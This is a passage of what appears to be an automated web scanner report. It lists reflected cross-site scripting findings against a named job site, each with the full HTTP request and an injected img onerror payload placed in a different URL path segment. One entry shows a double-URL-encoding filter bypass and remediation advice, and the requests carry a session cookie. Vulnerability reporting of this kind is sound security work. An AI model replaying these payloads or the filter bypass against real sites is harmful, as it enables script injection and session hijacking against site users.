GET /modulesf56d7"><img%20src%3da%20onerror%3dalert(1)>18564c695ef/user/user.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 384dd"><img%20src%3da%20onerror%3dalert(1)>cb03368af2d was submitted in the REST URL parameter 2. This input was echoed as 384dd"><img src=a onerror=alert(1)>cb03368af2d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/user384dd"><img%20src%3da%20onerror%3dalert(1)>cb03368af2d/user.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcae4"><img%20src%3da%20onerror%3dalert(1)>8e144cc5a4f was submitted in the REST URL parameter 3. This input was echoed as bcae4"><img src=a onerror=alert(1)>8e144cc5a4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/user/user.cssbcae4"><img%20src%3da%20onerror%3dalert(1)>8e144cc5a4f?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1d6e"><img%20src%3da%20onerror%3dalert(1)>39ce1ac88d4 was submitted in the REST URL parameter 1. This input was echoed as b1d6e"><img src=a onerror=alert(1)>39ce1ac88d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesb1d6e"><img%20src%3da%20onerror%3dalert(1)>39ce1ac88d4/all/modules/antispam/antispam.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983d6"><img%20src%3da%20onerror%3dalert(1)>da38364a609 was submitted in the REST URL parameter 2. This input was echoed as 983d6"><img src=a onerror=alert(1)>da38364a609 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all983d6"><img%20src%3da%20onerror%3dalert(1)>da38364a609/modules/antispam/antispam.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5fb9"><img%20src%3da%20onerror%3dalert(1)>1733aaca289 was submitted in the REST URL parameter 3. This input was echoed as a5fb9"><img src=a onerror=alert(1)>1733aaca289 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesa5fb9"><img%20src%3da%20onerror%3dalert(1)>1733aaca289/antispam/antispam.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b934a"><img%20src%3da%20onerror%3dalert(1)>9153850d8df was submitted in the REST URL parameter 4. This input was echoed as b934a"><img src=a onerror=alert(1)>9153850d8df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/antispamb934a"><img%20src%3da%20onerror%3dalert(1)>9153850d8df/antispam.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70579"><img%20src%3da%20onerror%3dalert(1)>61f4e445c3a was submitted in the REST URL parameter 5. This input was echoed as 70579"><img src=a onerror=alert(1)>61f4e445c3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/antispam/antispam.js70579"><img%20src%3da%20onerror%3dalert(1)>61f4e445c3a?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4af12%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eaec5804153d was submitted in the REST URL parameter 5. This input was echoed as 4af12"><img src=a onerror=alert(1)>aec5804153d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e463"><img%20src%3da%20onerror%3dalert(1)>cdfba77e90c was submitted in the REST URL parameter 1. This input was echoed as 7e463"><img src=a onerror=alert(1)>cdfba77e90c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites7e463"><img%20src%3da%20onerror%3dalert(1)>cdfba77e90c/all/modules/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae427"><img%20src%3da%20onerror%3dalert(1)>69860021042 was submitted in the REST URL parameter 2. This input was echoed as ae427"><img src=a onerror=alert(1)>69860021042 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allae427"><img%20src%3da%20onerror%3dalert(1)>69860021042/modules/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0fad"><img%20src%3da%20onerror%3dalert(1)>1d2bbd370ba was submitted in the REST URL parameter 3. This input was echoed as a0fad"><img src=a onerror=alert(1)>1d2bbd370ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesa0fad"><img%20src%3da%20onerror%3dalert(1)>1d2bbd370ba/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce390"><img%20src%3da%20onerror%3dalert(1)>3c08ceec826 was submitted in the REST URL parameter 4. This input was echoed as ce390"><img src=a onerror=alert(1)>3c08ceec826 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cckce390"><img%20src%3da%20onerror%3dalert(1)>3c08ceec826/modules/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e65d8"><img%20src%3da%20onerror%3dalert(1)>e9929ea8807 was submitted in the REST URL parameter 5. This input was echoed as e65d8"><img src=a onerror=alert(1)>e9929ea8807 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cck/modulese65d8"><img%20src%3da%20onerror%3dalert(1)>e9929ea8807/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e73f"><img%20src%3da%20onerror%3dalert(1)>19a202725ce was submitted in the REST URL parameter 6. This input was echoed as 6e73f"><img src=a onerror=alert(1)>19a202725ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cck/modules/fieldgroup6e73f"><img%20src%3da%20onerror%3dalert(1)>19a202725ce/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff42a"><img%20src%3da%20onerror%3dalert(1)>4df1db9c331 was submitted in the REST URL parameter 7. This input was echoed as ff42a"><img src=a onerror=alert(1)>4df1db9c331 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cck/modules/fieldgroup/fieldgroup.cssff42a"><img%20src%3da%20onerror%3dalert(1)>4df1db9c331?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa69"><img%20src%3da%20onerror%3dalert(1)>d04d20f30bd was submitted in the REST URL parameter 1. This input was echoed as bfa69"><img src=a onerror=alert(1)>d04d20f30bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesbfa69"><img%20src%3da%20onerror%3dalert(1)>d04d20f30bd/all/modules/cck/theme/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbafa"><img%20src%3da%20onerror%3dalert(1)>d4cc4ccb574 was submitted in the REST URL parameter 2. This input was echoed as cbafa"><img src=a onerror=alert(1)>d4cc4ccb574 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allcbafa"><img%20src%3da%20onerror%3dalert(1)>d4cc4ccb574/modules/cck/theme/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a826d"><img%20src%3da%20onerror%3dalert(1)>07168fe7c99 was submitted in the REST URL parameter 3. This input was echoed as a826d"><img src=a onerror=alert(1)>07168fe7c99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesa826d"><img%20src%3da%20onerror%3dalert(1)>07168fe7c99/cck/theme/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0c8"><img%20src%3da%20onerror%3dalert(1)>cb88e4e60ce was submitted in the REST URL parameter 4. This input was echoed as bf0c8"><img src=a onerror=alert(1)>cb88e4e60ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cckbf0c8"><img%20src%3da%20onerror%3dalert(1)>cb88e4e60ce/theme/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc41"><img%20src%3da%20onerror%3dalert(1)>4a59448569d was submitted in the REST URL parameter 5. This input was echoed as 5fc41"><img src=a onerror=alert(1)>4a59448569d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cck/theme5fc41"><img%20src%3da%20onerror%3dalert(1)>4a59448569d/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c74"><img%20src%3da%20onerror%3dalert(1)>ed85725023d was submitted in the REST URL parameter 6. This input was echoed as 64c74"><img src=a onerror=alert(1)>ed85725023d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cck/theme/content-module.css64c74"><img%20src%3da%20onerror%3dalert(1)>ed85725023d?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfd76"><img%20src%3da%20onerror%3dalert(1)>99b0fe2a1d7 was submitted in the REST URL parameter 1. This input was echoed as dfd76"><img src=a onerror=alert(1)>99b0fe2a1d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesdfd76"><img%20src%3da%20onerror%3dalert(1)>99b0fe2a1d7/all/modules/filefield/filefield.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a0d6"><img%20src%3da%20onerror%3dalert(1)>14b10f530b0 was submitted in the REST URL parameter 2. This input was echoed as 2a0d6"><img src=a onerror=alert(1)>14b10f530b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all2a0d6"><img%20src%3da%20onerror%3dalert(1)>14b10f530b0/modules/filefield/filefield.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa6eb"><img%20src%3da%20onerror%3dalert(1)>14bd3227d0a was submitted in the REST URL parameter 3. This input was echoed as fa6eb"><img src=a onerror=alert(1)>14bd3227d0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesfa6eb"><img%20src%3da%20onerror%3dalert(1)>14bd3227d0a/filefield/filefield.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c98c"><img%20src%3da%20onerror%3dalert(1)>069115183be was submitted in the REST URL parameter 4. This input was echoed as 3c98c"><img src=a onerror=alert(1)>069115183be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/filefield3c98c"><img%20src%3da%20onerror%3dalert(1)>069115183be/filefield.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fd8"><img%20src%3da%20onerror%3dalert(1)>1fcab1747c6 was submitted in the REST URL parameter 5. This input was echoed as c1fd8"><img src=a onerror=alert(1)>1fcab1747c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/filefield/filefield.cssc1fd8"><img%20src%3da%20onerror%3dalert(1)>1fcab1747c6?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73224"><img%20src%3da%20onerror%3dalert(1)>9589d103583 was submitted in the REST URL parameter 1. This input was echoed as 73224"><img src=a onerror=alert(1)>9589d103583 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
